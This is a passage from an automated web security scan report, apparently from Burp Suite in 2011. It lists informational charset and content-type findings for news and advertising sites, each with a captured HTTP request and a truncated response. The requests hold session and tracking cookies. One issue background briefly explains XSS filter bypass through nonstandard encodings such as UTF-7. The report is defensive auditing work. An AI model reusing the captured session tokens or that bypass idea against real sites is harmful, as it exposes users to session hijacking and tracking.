HTTP/1.1 200 OK
Server: Apache
ETag: "064014c3f86fd0df974c92a4f12e7353:1305721720"
Last-Modified: Wed, 18 May 2011 12:28:40 GMT
Accept-Ranges: bytes
Content-Type: text/html
Vary: Accept-Encoding
Content-Length: 2932
Cache-Control: max-age=120
Date: Sun, 04 Sep 2011 02:58:10 GMT
Connection: close

<style type="text/css">
<!--
a{text-decoration:none}
a:hover{text-decoration: underline}
-->
</style> <script language="JavaScript">
try{
var it_showhide=[1,1,1]; //Title,Description,URL
var it_title
...[SNIP]...

29.67. http://timesofindia.indiatimes.com/configspace/ads/googleshowtop.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://timesofindia.indiatimes.com
Path:   /configspace/ads/googleshowtop.html

Request

GET /configspace/ads/googleshowtop.html HTTP/1.1
Host: timesofindia.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/My-friend-Ganesha/articleshow/9855193.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true; __utma=1.1749513380.1315103166.1315103166.1315103166.1; __utmb=1.3.10.1315103166; __utmc=1; __utmz=1.1315103166.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RMID=32177b6a4e62e1a0; RMFD=011R02OxO106Bs|O108ih; _chartbeat2=8l1yir8xsllibs89

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "516e2d3104afd9cab169f2e2a4ff0add:1301466985"
Last-Modified: Wed, 30 Mar 2011 06:36:25 GMT
Accept-Ranges: bytes
Content-Type: text/html
Vary: Accept-Encoding
Content-Length: 2774
Cache-Control: max-age=120
Date: Sun, 04 Sep 2011 02:58:28 GMT
Connection: close


<html>
<head>
<META http-equiv="Content-Type" content="text/html">
<style type="text/css">
               a{text-decoration:none}
               a:hover{text-decoration: underline}
               </style>
</head>
<body><script lang
...[SNIP]...

29.68. http://timesofindia.indiatimes.com/sponseredlinksros.cms  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://timesofindia.indiatimes.com
Path:   /sponseredlinksros.cms

Request

GET /sponseredlinksros.cms HTTP/1.1
Host: timesofindia.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/articlelist/-2128838597.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true; __utma=1.1749513380.1315103166.1315103166.1315103166.1; __utmb=1.3.10.1315103166; __utmc=1; __utmz=1.1315103166.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RMID=32177b6a4e62e1a0; RMFD=011R02OxO106Bs

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
CacheControl: public
Content-Type: text/html
Vary: Accept-Encoding
Content-Length: 2724
Expires: Sun, 04 Sep 2011 11:04:06 GMT
Date: Sun, 04 Sep 2011 02:36:02 GMT
Connection: close

<html>
<head>
<META http-equiv="Content-Type" content="text/html">
<style type="text/css">
               a{text-decoration:none}
               a:hover{text-decoration: underline}
               span.contentboxhead {<BR>font-f
...[SNIP]...

29.69. http://twitterapi.indiatimes.com/feedtweet/tweet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitterapi.indiatimes.com
Path:   /feedtweet/tweet

Request

GET /feedtweet/tweet HTTP/1.1
Host: twitterapi.indiatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:20:14 GMT
Server: Apache/2.2.9 (Unix) DAV/2 mod_jk/1.2.25
Set-Cookie: JSESSIONID=788EEB6266D73155B2D8DB46D780C84A; Path=/feedtweet
Content-Length: 36
Connection: close
Content-Type: text/html


Please enter the story link

29.70. http://uac.advertising.com/wrapper/aceUACping.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://uac.advertising.com
Path:   /wrapper/aceUACping.htm

Request

GET /wrapper/aceUACping.htm HTTP/1.1
Host: uac.advertising.com
Proxy-Connection: keep-alive
Referer: http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1801219238@Right2?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=MTMxNTA5NzMwOTsxOjE3NjVpZnUxYWtrYzc5OjM2NQ; ACID=Rq690013151032380008; ASCID=Rq690013151032380008; C2=HIuYO9aFHYIiGD8sQdwSkaMwSKMCdbdRrxK4IEscGAHtnggnraAc; F1=Bgg4i5EBAAAABAAAAIAAgEA; BASE=oTwUjn8fYrESn1x8Qj3fRMC!; ROLL=XpwfbsHr/Y/PQCLUeRRTttG!

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2
Accept-Ranges: bytes
Cache-Control: max-age=3600
Expires: Sun, 04 Sep 2011 03:24:14 GMT
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV"
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 03:04:53 GMT
Content-Length: 2793
Connection: close

<html><head></head><body><script type='text/javascript'>    
// pingArray['cookieValue'] = ['extra_tag_property_name', 'matching pixel called']
var pingArray = new Array();
pingArray['rm'] = ['rmcpmprice
...[SNIP]...

29.71. http://web.adblade.com/clicks.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://web.adblade.com
Path:   /clicks.php

Request

GET /clicks.php HTTP/1.1
Host: web.adblade.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.8
P3P: policyref="http://adblade.com/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Vendor: Adblade LLC | Adblade| http://www.adblade.com
Content-type: text/html
Connection: close
Date: Sun, 04 Sep 2011 04:23:07 GMT
Server: lighttpd/1.4.21
Content-Length: 20

Wrong Application Id

29.72. http://web.adblade.com/impsc.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://web.adblade.com
Path:   /impsc.php

Request

GET /impsc.php HTTP/1.1
Host: web.adblade.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
X-Powered-By: PHP/5.2.8
P3P: policyref="http://adblade.com/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Vendor: Adblade LLC | Adblade| http://www.adblade.com
Content-type: text/html
Connection: close
Date: Sun, 04 Sep 2011 04:23:03 GMT
Server: lighttpd/1.4.21
Content-Length: 3102

<html>
<head>
<link rel="stylesheet" href="http://web.adblade.com/css/zones/common.css" type="text/css" />
<style>
.zoneTable {
width:550px;

...[SNIP]...

29.73. http://www.dnaindia.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dnaindia.com
Path:   /

Request

GET / HTTP/1.1
Host: www.dnaindia.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=bangkok+thailand+news#sclient=psy&hl=en&source=hp&q=mumbay+news&pbx=1&oq=mumbay+news&aq=f&aqi=g-c5&aql=&gs_sm=e&gs_upl=32342l36076l0l37100l8l7l1l0l0l4l1052l4032l3-1.1.1.2.1l6l0&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1233&bih=1037
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html
Date: Sun, 04 Sep 2011 02:31:13 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 113803
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Mumbai - In
...[SNIP]...

29.74. http://www.dnaindia.com/comments_display_frame710.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dnaindia.com
Path:   /comments_display_frame710.php

Request

GET /comments_display_frame710.php?newsid=1582811 HTTP/1.1
Host: www.dnaindia.com
Proxy-Connection: keep-alive
Referer: http://www.dnaindia.com/sport/report_sachin-tendulkar-s-toe-injury-flares-up-to-meet-surgeon_1582811
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AWSELB=D9FF293318E2FE6482ABC137988F4175DB56AFA2CC3F3B2903E14FEE4B354E391D38E27D538AAB9D939069DEBE0F6AD1AE83965EDE23FBFAE2AB03A236DF6291C879D568A9; __gads=ID=1063ad11e8c8983a:T=1315103138:S=ALNI_MZLAgHk-KRcEjPEIBIf8NJ_VstEbg; __utmb=248229458; __utmc=248229458; __utma=248229458.440785124.1315103176.1315103176.1315103176.1; __utmz=248229458.1315103178.1.1.utmccn=(organic)|utmcsr=google|utmctr=bangkok+thailand+news#sclient=psy|utmcmd=organic

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html
Date: Sun, 04 Sep 2011 03:15:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Server: Apache
Set-Cookie: DNA=1; expires=Wed, 05-Oct-2011 03:15:28 GMT
Vary: Accept-Encoding
Content-Length: 23
Connection: keep-alive


<div>&nbsp;</div>

29.75. http://www.dnaindia.com/redirect  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dnaindia.com
Path:   /redirect

Request

GET /redirect HTTP/1.1
Host: www.dnaindia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Date: Sun, 04 Sep 2011 04:28:26 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 502
Connection: Close

<html>

<head>
<title>DNA - Daily News & Analysis</title>
<META NAME="Googlebot" CONTENT="nofollow">
<META HTTP-EQUIV="refresh" CONTENT="3;url=">
</head>

<body>

<a href="">If you are not a
...[SNIP]...

29.76. http://www.dnaindia.com/sport/report_rain-plays-spoilsport-first-odi-abandoned_1582791  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dnaindia.com
Path:   /sport/report_rain-plays-spoilsport-first-odi-abandoned_1582791

Request

GET /sport/report_rain-plays-spoilsport-first-odi-abandoned_1582791 HTTP/1.1
Host: www.dnaindia.com
Proxy-Connection: keep-alive
Referer: http://www.dnaindia.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AWSELB=D9FF293318E2FE6482ABC137988F4175DB56AFA2CC3F3B2903E14FEE4B354E391D38E27D538AAB9D939069DEBE0F6AD1AE83965EDE23FBFAE2AB03A236DF6291C879D568A9; __gads=ID=1063ad11e8c8983a:T=1315103138:S=ALNI_MZLAgHk-KRcEjPEIBIf8NJ_VstEbg; __utmb=248229458; __utmc=248229458; __utma=248229458.440785124.1315103176.1315103176.1315103176.1; __utmz=248229458.1315103178.1.1.utmccn=(organic)|utmcsr=google|utmctr=bangkok+thailand+news#sclient=psy|utmcmd=organic

Response

HTTP/1.1 200 OK
Content-Type: text/html
Date: Sun, 04 Sep 2011 03:08:46 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 45463
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...

29.77. http://www.dnaindia.com/sport/report_sachin-tendulkar-s-toe-injury-flares-up-to-meet-surgeon_1582811  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dnaindia.com
Path:   /sport/report_sachin-tendulkar-s-toe-injury-flares-up-to-meet-surgeon_1582811

Request

GET /sport/report_sachin-tendulkar-s-toe-injury-flares-up-to-meet-surgeon_1582811 HTTP/1.1
Host: www.dnaindia.com
Proxy-Connection: keep-alive
Referer: http://www.dnaindia.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AWSELB=D9FF293318E2FE6482ABC137988F4175DB56AFA2CC3F3B2903E14FEE4B354E391D38E27D538AAB9D939069DEBE0F6AD1AE83965EDE23FBFAE2AB03A236DF6291C879D568A9; __gads=ID=1063ad11e8c8983a:T=1315103138:S=ALNI_MZLAgHk-KRcEjPEIBIf8NJ_VstEbg; __utmb=248229458; __utmc=248229458; __utma=248229458.440785124.1315103176.1315103176.1315103176.1; __utmz=248229458.1315103178.1.1.utmccn=(organic)|utmcsr=google|utmctr=bangkok+thailand+news#sclient=psy|utmcmd=organic

Response

HTTP/1.1 200 OK
Content-Type: text/html
Date: Sun, 04 Sep 2011 03:09:12 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 45031
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...

29.78. http://www.dnaindia.com/world  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dnaindia.com
Path:   /world

Request

GET /world HTTP/1.1
Host: www.dnaindia.com
Proxy-Connection: keep-alive
Referer: http://www.dnaindia.com/sport/report_sachin-tendulkar-s-toe-injury-flares-up-to-meet-surgeon_1582811
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AWSELB=D9FF293318E2FE6482ABC137988F4175DB56AFA2CC3F3B2903E14FEE4B354E391D38E27D538AAB9D939069DEBE0F6AD1AE83965EDE23FBFAE2AB03A236DF6291C879D568A9; __gads=ID=1063ad11e8c8983a:T=1315103138:S=ALNI_MZLAgHk-KRcEjPEIBIf8NJ_VstEbg; __utmc=248229458; __utma=248229458.440785124.1315103176.1315103176.1315103176.1; __utmz=248229458.1315103178.1.1.utmccn=(organic)|utmcsr=google|utmctr=bangkok+thailand+news#sclient=psy|utmcmd=organic; PHPSESSID=ja953u85brl5fup65sknnkg435; DNA=1; __utmb=248229458

Response

HTTP/1.1 200 OK
Content-Type: text/html
Date: Sun, 04 Sep 2011 03:33:09 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 24938
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org
...[SNIP]...

29.79. http://www.mtv.com/news/articles/1670209/1991-pearl-jam-soundgarden-nirvana.jhtml/x26amp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mtv.com
Path:   /news/articles/1670209/1991-pearl-jam-soundgarden-nirvana.jhtml/x26amp

Request

GET /news/articles/1670209/1991-pearl-jam-soundgarden-nirvana.jhtml/x26amp HTTP/1.1
Host: www.mtv.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
Last-Modified: Mon, 28 Sep 2009 18:41:22 GMT
ETag: "2c35a82-c5a-474a7a4e9f880"
Accept-Ranges: bytes
Content-Length: 3162
Content-Type: text/html
Date: Sun, 04 Sep 2011 04:40:20 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head
...[SNIP]...

29.80. http://www.mtv.com/news/articles/1670218/jennifer-lopez-american-idol.jhtml/x26amp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mtv.com
Path:   /news/articles/1670218/jennifer-lopez-american-idol.jhtml/x26amp

Request

GET /news/articles/1670218/jennifer-lopez-american-idol.jhtml/x26amp HTTP/1.1
Host: www.mtv.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
Last-Modified: Mon, 28 Sep 2009 18:41:22 GMT
ETag: "2c35a82-c5a-474a7a4e9f880"
Accept-Ranges: bytes
Content-Length: 3162
Content-Type: text/html
Date: Sun, 04 Sep 2011 04:40:30 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head
...[SNIP]...

29.81. http://www.mtv.com/news/articles/1670220/linkin-park-chester-bennington-new-album.jhtml/x26amp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mtv.com
Path:   /news/articles/1670220/linkin-park-chester-bennington-new-album.jhtml/x26amp

Request

GET /news/articles/1670220/linkin-park-chester-bennington-new-album.jhtml/x26amp HTTP/1.1
Host: www.mtv.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
Last-Modified: Mon, 28 Sep 2009 18:41:22 GMT
ETag: "2c35a82-c5a-474a7a4e9f880"
Accept-Ranges: bytes
Content-Length: 3162
Content-Type: text/html
Date: Sun, 04 Sep 2011 04:40:14 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head
...[SNIP]...

29.82. http://www.ndtv.com/news/redirect/url.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ndtv.com
Path:   /news/redirect/url.php

Request

GET /news/redirect/url.php HTTP/1.1
Host: www.ndtv.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Pragma: public
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Cache-Control: max-age=31529576
Expires: Mon, 03 Sep 2012 02:56:03 GMT
Date: Sun, 04 Sep 2011 04:43:07 GMT
Content-Length: 413
Connection: close

<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com
...[SNIP]...

29.83. http://www.ndtv.com/news/utils/new_ajax_gateway.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ndtv.com
Path:   /news/utils/new_ajax_gateway.php

Request

GET /news/utils/new_ajax_gateway.php HTTP/1.1
Host: www.ndtv.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Cache-Control: max-age=58
Expires: Sun, 04 Sep 2011 04:44:06 GMT
Date: Sun, 04 Sep 2011 04:43:08 GMT
Content-Length: 18
Connection: close

Content not found.

29.84. http://www.networkadvertising.org/managing/opt_out.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.networkadvertising.org
Path:   /managing/opt_out.asp

Request

GET /managing/opt_out.asp HTTP/1.1
Host: www.networkadvertising.org
Proxy-Connection: keep-alive
Referer: http://tidaltv.com/PrivacyDashboard.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 04 Sep 2011 10:59:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
cache-control: private
pragma: no-cache
cache-control: private
pragma: no-cache
Content-Type: text/html
Expires: Sat, 03 Sep 2011 10:59:00 GMT
Cache-control: no-cache


<script>
if(location.hostname != 'www.networkadvertising.org') {
window.location="http://www.networkadvertising.org/managing/opt_out.asp";
}
</script>

<script>
//_________________________
...[SNIP]...

29.85. http://www.networkadvertising.org/managing/optout_results.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.networkadvertising.org
Path:   /managing/optout_results.asp

Request

POST /managing/optout_results.asp HTTP/1.1
Host: www.networkadvertising.org
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
Content-Length: 873
Cache-Control: max-age=0
Origin: http://www.networkadvertising.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSASBDATQ=FCNKKPJCMDIJJDNIDDFMIMFA; __utma=1.1392774634.1315133979.1315133979.1315133979.1; __utmb=1; __utmc=1; __utmz=1.1315133979.1.1.utmccn=(referral)|utmcsr=tidaltv.com|utmcct=/PrivacyDashboard.aspx|utmcmd=referral

optThis=1&optThis=2&optThis=3&optThis=4&optThis=5&optThis=6&optThis=7&optThis=8&optThis=9&optThis=10&optThis=11&optThis=12&optThis=13&optThis=14&optThis=15&optThis=16&optThis=17&optThis=18&optThis=19&
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 04 Sep 2011 11:12:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
cache-control: private
pragma: no-cache
Content-Type: text/html
Expires: Sat, 03 Sep 2011 11:12:24 GMT
Cache-control: no-cache


<html>
   <head>
       <title> Welcome to Network Advertising Initiative </title>


       <link rel = stylesheet href = "../library/nai_masterstyle.css" Type = "text/css">
   
<script src="http://ww
...[SNIP]...

29.86. http://www.taiwannews.com.tw/etn/news_content.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.taiwannews.com.tw
Path:   /etn/news_content.php

Request

GET /etn/news_content.php HTTP/1.1
Host: www.taiwannews.com.tw
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:44:19 GMT
Server: Apache
Cache-Control: private, pre-check=0, post-check=0, max-age=0
Pragma: no-cache
Content-Length: 149
Connection: close
Content-Type: text/html

error: invalid news id or rss file path <script type="text/javascript">location.href ="index_en.php";</script>error: invalid news id or rss file path

29.87. http://www.tribalfusion.com/test/opt.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tribalfusion.com
Path:   /test/opt.js

Request

GET /test/opt.js HTTP/1.1
Host: www.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=acntIZdr2PKyruYnRY671MyFfmhZdHpni7AU5HqolbGMnoAh1myLwtwKZalWJyuDgb1kXyPrXjePLDOBMZdEl4XqZbFjGfn9fmebZd

Response

HTTP/1.1 200 OK
Server: Resin/3.1.8
Cache-Control: no-store
Content-Type: text/html
Content-Length: 25
Date: Sun, 04 Sep 2011 10:59:00 GMT

var TFID='';
OPT_DO();

29.88. http://yads.zedo.com/ads3/a  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://yads.zedo.com
Path:   /ads3/a

Request

GET /ads3/a HTTP/1.1
Host: yads.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:46:34 GMT
Server: ZEDO 3G
Expires: -1
Pragma: no-cache
Cache-Control: no-cache
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Edge-Control: !no-store
Vary: Accept-Encoding
Content-Length: 282
Connection: close
Content-Type: text/html

<HTML><HEAD></HEAD><BODY><a href='http://yads.zedo.com/ads3/c?a=0;x=0;g=172,0;c=0,0;i=64;n=0;w=47;m=82;s=0;z=3248050;k=http://www.zedo.com'TARGET='_blank'><img src='http://d1.zedo.com/OzoDB/0/0/0/blan
...[SNIP]...

30. HTML uses unrecognised charset  previous  next
There are 6 instances of this issue:

Issue background

Applications may specify a non-standard character set as a result of typographical errors within the code base, or because of intentional usage of an unusual character set that is not universally recognised by browsers. If the browser does not recognise the character set specified by the application, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.


30.1. http://truehits.net/stat.php  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://truehits.net
Path:   /stat.php

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /stat.php HTTP/1.1
Host: truehits.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Sun, 04 Sep 2011 04:21:20 GMT
Server: Apache
Content-Length: 38194

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
